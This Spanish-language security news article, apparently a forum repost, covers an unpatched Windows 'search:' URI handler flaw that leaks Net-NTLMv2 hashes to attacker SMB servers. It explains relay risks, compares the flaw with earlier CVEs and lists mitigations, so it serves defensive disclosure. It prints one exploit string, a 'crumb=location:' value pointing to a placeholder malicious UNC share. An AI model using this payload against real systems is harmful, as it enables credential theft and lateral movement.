Nueva vulnerabilidad Windows expone hashes NTLMv2

Investigadores en ciberseguridad han revelado una nueva vulnerabilidad sin parchear en Windows que podría ser utilizada por ciberdelincuentes para obtener hashes NTLMv2 de usuarios legítimos, abriendo la puerta a ataques de retransmisión, movimientos laterales y posibles compromisos de red.

El hallazgo, divulgado por los expertos de Huntress, afecta al manejador de URI "search:" de Windows y comparte importantes similitudes con una vulnerabilidad corregida recientemente por Microsoft, identificada como CVE-2026-33829. Aunque el fabricante fue informado de manera responsable sobre el problema, la compañía decidió no emitir una actualización de seguridad debido a que considera que el fallo no alcanza el umbral requerido para una corrección prioritaria.

La revelación ha generado preocupación entre profesionales de seguridad y administradores de sistemas, ya que el fallo puede ser explotado mediante técnicas relativamente sencillas para provocar que un sistema Windows revele credenciales de autenticación NTLMv2 a servidores controlados por atacantes.

¿Qué es NTLMv2 y por qué sigue siendo un objetivo atractivo?

NTLM (New Technology LAN Manager) es un protocolo de autenticación desarrollado por Microsoft que continúa presente en numerosos entornos empresariales, especialmente en infraestructuras heredadas y redes híbridas.

Aunque tecnologías más modernas como Kerberos han reemplazado gran parte de su funcionalidad, NTLM sigue siendo ampliamente utilizado para la autenticación de usuarios, el acceso a recursos compartidos y determinados servicios internos de Windows.

Cuando un sistema intenta autenticarse utilizando NTLMv2, genera un hash criptográfico que, si bien no contiene directamente la contraseña del usuario, puede ser aprovechado por atacantes para realizar diferentes tipos de ataques.

Entre ellos destacan:

• Ataques de retransmisión NTLM.
• Movimiento lateral dentro de la red.
• Acceso no autorizado a recursos corporativos.
• Escalada de privilegios.
• Reconocimiento avanzado de infraestructura.

Por este motivo, cualquier vulnerabilidad capaz de exponer hashes NTLMv2 representa una amenaza significativa para la seguridad empresarial.

Cómo funciona la nueva vulnerabilidad descubierta por Huntress

Según explicó Andrew Schwartz, investigador de Huntress, el problema reside en el manejador URI "search:" integrado en Windows.

La vulnerabilidad permite que un atacante cree enlaces especialmente manipulados capaces de inducir al sistema operativo a conectarse automáticamente a un recurso SMB remoto controlado por el atacante.

El comando utilizado para explotar esta debilidad tiene la siguiente estructura:

search=test&crumb=location:\servidor_malicioso\share

Cuando la víctima interactúa con el enlace, Windows intenta acceder a la ubicación especificada utilizando una ruta UNC (Universal Naming Convention).

Durante este proceso, el sistema inicia automáticamente un procedimiento de autenticación NTLM para intentar conectarse al recurso remoto.

Como consecuencia, el hash Net-NTLMv2 del usuario es enviado al servidor controlado por el atacante, quien puede capturarlo para posteriores acciones maliciosas.

Similitudes con CVE-2026-33829

Los investigadores señalaron que este nuevo problema comparte numerosas características con la vulnerabilidad CVE-2026-33829, corregida por Microsoft en abril de 2026.

Aquella vulnerabilidad afectaba al manejador URI utilizado por la Herramienta de Recorte de Windows (Snipping Tool), específicamente a través del parámetro "filePath".

El fallo permitía que la aplicación accediera a rutas UNC arbitrarias sin realizar una validación adecuada, provocando exactamente el mismo resultado: la filtración de hashes Net-NTLMv2 mediante conexiones SMB controladas por atacantes.

En ambos casos se observan características prácticamente idénticas:

• Exposición de hashes NTLMv2.
• Requerimiento de interacción del usuario.
• Uso de rutas UNC remotas.
• Posibilidad de ataques de retransmisión.
• Clasificación de gravedad moderada.

Sin embargo, mientras Microsoft corrigió CVE-2026-33829, decidió no actuar sobre esta nueva variante.

Un problema que recuerda a vulnerabilidades anteriores

Aunque la vulnerabilidad ha ganado notoriedad recientemente, el uso del parámetro "crumb" para provocar fugas de credenciales no es completamente nuevo.

Los investigadores recordaron que una técnica similar ya había sido documentada anteriormente en la vulnerabilidad CVE-2023-35636, analizada por expertos de seguridad en 2024.

Esto demuestra que los manejadores URI continúan representando una superficie de ataque relevante dentro del ecosistema Windows, especialmente cuando interactúan con protocolos heredados como SMB y NTLM.

La persistencia de este tipo de escenarios evidencia las dificultades que enfrentan los fabricantes para eliminar por completo riesgos asociados a componentes históricos que aún forman parte de millones de sistemas empresariales.

Riesgos para organizaciones y entornos corporativos

La filtración de hashes NTLMv2 puede parecer un problema menor a primera vista, pero en realidad puede tener consecuencias significativas para la seguridad de una organización.

Una vez capturado el hash, un atacante puede utilizar herramientas especializadas para ejecutar ataques de retransmisión NTLM contra otros sistemas dentro de la red.

En entornos mal segmentados, esto puede facilitar:

Acceso a recursos internos

Los atacantes pueden autenticarse frente a servicios que acepten conexiones NTLM.

Movimiento lateral

La obtención de credenciales válidas facilita el desplazamiento entre diferentes sistemas de la infraestructura.

Escalada de privilegios

En determinadas circunstancias, los atacantes podrían aprovechar configuraciones inseguras para obtener permisos elevados.

Compromiso de servicios críticos

Controladores de dominio, servidores de archivos y aplicaciones empresariales podrían convertirse en objetivos posteriores.

Por esta razón, incluso vulnerabilidades clasificadas como moderadas pueden representar un riesgo considerable cuando son utilizadas como parte de cadenas de ataque más complejas.

Microsoft rechaza emitir un parche

Tras recibir la divulgación responsable el 15 de abril de 2026, Microsoft analizó el problema y decidió no desarrollar una corrección.

Según la respuesta proporcionada a los investigadores, la compañía indicó que únicamente los casos catalogados como de gravedad Importante o Crítica cumplen actualmente los criterios necesarios para recibir mantenimiento de seguridad dentro de su programa de respuesta.

Esta decisión ha generado debate entre profesionales del sector, quienes consideran que las fugas de hashes NTLM continúan siendo una amenaza relevante en redes empresariales modernas.

Medidas de mitigación recomendadas

Ante la ausencia de una solución oficial, los especialistas recomiendan adoptar varias medidas defensivas para reducir significativamente la superficie de ataque.

Bloquear SMB saliente

Las organizaciones deberían restringir el tráfico SMB saliente a través de los puertos TCP 445 y TCP 139 en aquellos equipos que no requieran este tipo de conexiones.

Habilitar la firma SMB

La firma SMB dificulta considerablemente los ataques de retransmisión al garantizar la integridad de las comunicaciones.

Desactivar NTLM cuando sea posible

Microsoft lleva años recomendando la transición hacia mecanismos de autenticación más seguros como Kerberos.

Implementar segmentación de red

Una adecuada segmentación limita el impacto potencial de cualquier credencial comprometida.

Capacitar a los usuarios

La mayoría de los escenarios de explotación requieren que la víctima interactúe con enlaces maliciosos, por lo que la concienciación sigue siendo una medida fundamental.

Un nuevo recordatorio de los riesgos asociados a NTLM

La nueva vulnerabilidad descubierta en el manejador URI "search:" de Windows pone de manifiesto que NTLM continúa siendo una superficie de ataque relevante dentro de los entornos corporativos modernos.

Aunque Microsoft considera que el problema no justifica una actualización de seguridad, la posibilidad de capturar hashes NTLMv2 y utilizarlos en ataques posteriores representa un riesgo que las organizaciones no deben ignorar.

Mientras no exista una corrección oficial, la implementación de controles defensivos como el bloqueo de SMB saliente, la firma SMB obligatoria y la eliminación progresiva de NTLM seguirá siendo la mejor estrategia para reducir la exposición frente a este tipo de amenazas y fortalecer la seguridad de la infraestructura empresarial.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login